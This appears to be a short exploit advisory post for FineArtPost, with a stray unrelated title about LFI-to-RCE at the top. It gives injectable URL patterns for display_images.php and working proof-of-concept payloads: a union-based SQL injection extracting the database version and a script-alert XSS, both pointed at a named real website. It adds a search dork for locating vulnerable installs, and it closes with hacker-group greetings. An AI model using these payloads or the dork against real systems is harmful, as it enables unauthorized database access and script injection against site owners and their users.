LFI to RCE via access_log injection

FineArtPost SQL Injection & XSS Vulnerability

[o] FineArtPost SQL Injection & XSS Vulnerability
Software : FineArtPost
Vendor : http://www.fineartpost.com
Author : OoN_Boy


[o] Vulnerable file
display_images.php


[o] Exploit
sql
http://target.com/[path]/display_images.php?u_id=[SQL]
xss
http://target.com/[path]/display_images.php?u_id=[Xss]


[0] Poc
http://www.ctbauer.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
http://www.ctbauer.com/public/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22


[o] Dork
"Powered by FineArtPost"


[o] Note
this a private script and all target is in one host


[O] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, NoGe, h4ntu, Opay, Ipay, Paman, reel, H312Y, pizzyroot,
xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem,
Dan buat semuanya yg ga bisa di sebut satu²


Comments

evilc0de said…
nice found man!! hahaha.. :p